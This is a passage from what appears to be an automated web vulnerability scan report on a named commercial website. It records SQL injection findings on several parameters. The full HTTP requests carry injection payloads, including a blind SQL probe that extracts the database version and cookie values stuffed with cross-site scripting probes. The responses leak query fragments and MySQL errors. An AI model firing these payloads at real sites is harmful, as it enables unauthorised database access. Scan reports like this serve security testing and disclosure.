Set-Cookie: PHPSESSID=rq61dik9hjcinvbv72jh6f5am6; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=43vimr7gfqrmapo928pb76bpi6; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.199. http://www.insideup.com/ppc/leadflow/cace00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mg5pgf6etv63k5dio2qrkt2v64; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k0iuotrqvacqo70rmkb1tqefo5; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.200. http://www.insideup.com/ppc/leadflow/cace00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fc0bfc5khkk9fe1qv02lgect64; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBST' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ug8eetfvmq4u43kdf2981b9vk4; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.201. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:32:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f65sjs7vvev6hoqib811e4voc4; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow'/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow'/cace0' at line 5

Request 2

GET /ppc/leadflow''/cace00/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:32:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g5nr4qlc02oneju06m9v219rh3; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/cace00/project_dynamic_page_updated.php was not found on this server.</p>

1.202. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00'/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 